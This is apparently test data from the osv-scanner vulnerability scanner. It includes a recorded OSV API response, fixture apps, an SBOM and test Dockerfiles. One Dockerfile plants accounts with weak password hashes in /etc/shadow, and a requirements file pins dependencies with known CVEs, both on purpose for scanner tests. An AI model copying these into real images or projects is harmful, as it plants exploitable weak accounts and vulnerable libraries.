"util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { 
"ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/ubuntu_image_with_go_OS_packages_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 17153 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": "2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", "modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": 
"UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "GO-2022-0477", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" }, { "id": "GO-2022-0515", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0520", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0521", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0522", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0523", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0524", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0525", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0526", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0527", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0531", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0532", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0533", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0537", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0969", "modified": "2026-02-04T02:41:02.475503Z" }, { "id": "GO-2022-1037", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1038", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1039", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1095", "modified": "2026-02-04T04:25:45.960420Z" }, { "id": "GO-2022-1143", "modified": "2026-02-04T04:08:13.589543Z" }, { "id": "GO-2022-1144", "modified": "2026-02-04T04:29:40.352025Z" }, { "id": "GO-2023-1568", "modified": "2026-02-04T02:54:08.789114Z" }, { "id": "GO-2023-1569", "modified": "2026-02-04T03:22:48.161542Z" }, { "id": "GO-2023-1570", "modified": "2026-02-04T02:57:33.465285Z" }, { "id": "GO-2023-1571", "modified": "2026-02-04T03:36:14.767832Z" }, { "id": "GO-2023-1621", "modified": "2026-02-04T02:47:06.125087Z" }, { "id": "GO-2023-1702", "modified": "2026-02-04T03:43:08.732164Z" }, { "id": "GO-2023-1703", "modified": 
"2026-02-04T04:24:15.366665Z" }, { "id": "GO-2023-1704", "modified": "2026-02-04T04:39:41.032390Z" }, { "id": "GO-2023-1705", "modified": "2026-02-04T03:44:01.631552Z" }, { "id": "GO-2023-1751", "modified": "2026-02-04T04:31:56.779446Z" }, { "id": "GO-2023-1752", "modified": "2026-02-04T03:50:58.841420Z" }, { "id": "GO-2023-1753", "modified": "2026-02-04T02:22:30.446388Z" }, { "id": "GO-2023-1840", "modified": "2026-02-04T03:48:08.792378Z" }, { "id": "GO-2023-1878", "modified": "2026-02-04T04:31:14.443108Z" }, { "id": "GO-2023-1987", "modified": "2026-02-04T03:58:58.871084Z" }, { "id": "GO-2023-2041", "modified": "2026-02-04T04:25:22.510281Z" }, { "id": "GO-2023-2043", "modified": "2026-02-04T04:11:02.549923Z" }, { "id": "GO-2023-2102", "modified": "2026-02-04T03:49:27.289895Z" }, { "id": "GO-2023-2185", "modified": "2026-02-04T02:59:25.590966Z" }, { "id": "GO-2023-2186", "modified": "2026-02-04T03:56:59.969208Z" }, { "id": "GO-2023-2375", "modified": "2026-02-04T03:57:11.083315Z" }, { "id": "GO-2023-2382", "modified": "2026-02-04T03:33:11.274886Z" }, { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", 
"modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": 
"2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", "modified": "2026-01-20T19:15:15.770361Z" }, { "id": "UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", 
"modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": 
"2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" 
} ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", "modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": 
[ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": "2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { 
"id": "UBUNTU-CVE-2024-12133", "modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": 
"2026-02-04T02:15:05.324531Z" }, { "id": "USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "17153" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/java-fixture/app/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testdata/java-fixture/app/pom.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0-SNAPSHOT my-app https://osv.dev org.apache.hadoop hadoop-client 3.4.0 org.apache.commons commons-compress 1.21 maven-assembly-plugin com.mycompany.app.App jar-with-dependencies make-assembly package single 1.8 1.8 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/java-fixture/app/src/main/java/com/mycompany/app/App.java ================================================ package com.mycompany.app; /** * Hello world! * */ public class App { public static void main( String[] args ) { System.out.println( "Hello World!" 
); } } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/lockfile-fixture/alpine-zlib-16.cdx.json ================================================ { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "metadata": { "timestamp": "2025-07-08T05:23:38Z", "tools": { "components": [ { "type": "application", "name": "SCALIBR", "externalReferences": [ { "url": "https://github.com/google/osv-scalibr", "type": "website" } ] } ] }, "authors": [ {} ], "component": { "bom-ref": "a5add6de-55de-40a9-aa0d-1f03de5ab308", "type": "", "name": "" } }, "components": [ { "bom-ref": "6756e583-83d8-4a08-a573-d2e9506cbd93", "type": "library", "name": "zlib", "version": "1.2.12-r1", "purl": "pkg:apk/alpine/zlib@1.2.12-r1?arch=x86_64\u0026distro=3.22.0\u0026origin=zlib", "evidence": { "occurrences": [ { "location": "lib/apk/db/installed" } ] } } ] } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/lockfile-fixture/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testdata/package-tracing-fixture/go.mod ================================================ module ptf go 1.22.4 require github.com/BurntSushi/toml v1.4.0 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/package-tracing-fixture/go.sum ================================================ github.com/BurntSushi/toml v1.4.0 h1:kuoIxZQy2WRRk1pttg9asf+WVv6tWQuBNVmK8+nqPr0= github.com/BurntSushi/toml v1.4.0/go.mod h1:ukJfTF/6rtPPRCnwkur4qwRxa8vTRFBF0uk2lLoLwho= ================================================ FILE: cmd/osv-scanner/scan/image/testdata/package-tracing-fixture/main.go ================================================ package main import ( "os" "github.com/BurntSushi/toml" ) func main() { 
toml.NewEncoder(os.Stdout) } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/package-tracing-fixture/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testdata/python-fixture/main.py ================================================ def main(): return 'Hello, World!' if __name__ == '__main__': main() ================================================ FILE: cmd/osv-scanner/scan/image/testdata/python-fixture/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testdata/python-fixture/requirements.txt ================================================ flask==0.12.2 # Vulnerable to CVE-2019-1010083 django==1.11.29 # Vulnerable to CVE-2021-35042 requests==2.20.0 # Vulnerable to CVE-2018-18074 # Transitive deps certifi==2025.11.12 chardet==3.0.4 click==8.1.8 Django==1.11.29 Flask==0.12.2 idna==2.7 itsdangerous==2.2.0 Jinja2==3.1.6 MarkupSafe==3.0.3 pytz==2025.2 requests==2.20.0 urllib3==1.24.3 Werkzeug==3.1.4 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-alpine-etcshadow.Dockerfile ================================================ FROM alpine:3.10@sha256:451eee8bedcb2f029756dc3e9d73bab0e7943c1ac55cff3a4861c52a0fdd3e98 RUN echo 'user-bcrypt:$2b$05$IYDlXvHmeORyyiUwu8KKuek2LE8VrxIYZ2skPvRDDNngpXJHRq7sG' >> /etc/shadow RUN echo 'user-descrypt:chERDiI95PGCQ' >> /etc/shadow ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-alpine-sbom.Dockerfile ================================================ FROM alpine:3.10@sha256:451eee8bedcb2f029756dc3e9d73bab0e7943c1ac55cff3a4861c52a0fdd3e98 COPY lockfile-fixture/alpine-zlib-16.cdx.json /data/alpine-zlib-16.cdx.json 
================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-alpine.Dockerfile ================================================ FROM alpine:3.10@sha256:451eee8bedcb2f029756dc3e9d73bab0e7943c1ac55cff3a4861c52a0fdd3e98 # Switch the version to 3.18 to show the advisories published for the latest alpine versions COPY "alpine-3.18-alpine-release" "/etc/alpine-release" COPY "alpine-3.18-os-release" "/etc/os-release" ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-go-binary.Dockerfile ================================================ FROM golang:1.22.4-alpine3.20@sha256:ace6cc3fe58d0c7b12303c57afe6d6724851152df55e08057b43990b927ad5e8 AS build COPY package-tracing-fixture/ /work RUN cd /work && go get github.com/BurntSushi/toml@v1.4.0 && go mod tidy RUN cd /work && go build . RUN cp /work/ptf /work/ptf-1.4.0 FROM alpine:3.20.1@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 COPY --from=build /work/ptf-1.4.0 /go/bin/ ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-image-with-deprecated/Cargo.toml ================================================ [package] name = "rust_novuln_deprecated" version = "0.1.0" edition = "2021" [dependencies] url = "2.5.3" # This is a deprecated (yanked) version ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-image-with-deprecated/src/main.rs ================================================ use url::Url; fn main() { let _ = Url::parse("https://google.com"); // Just something to make sure the url crate is in 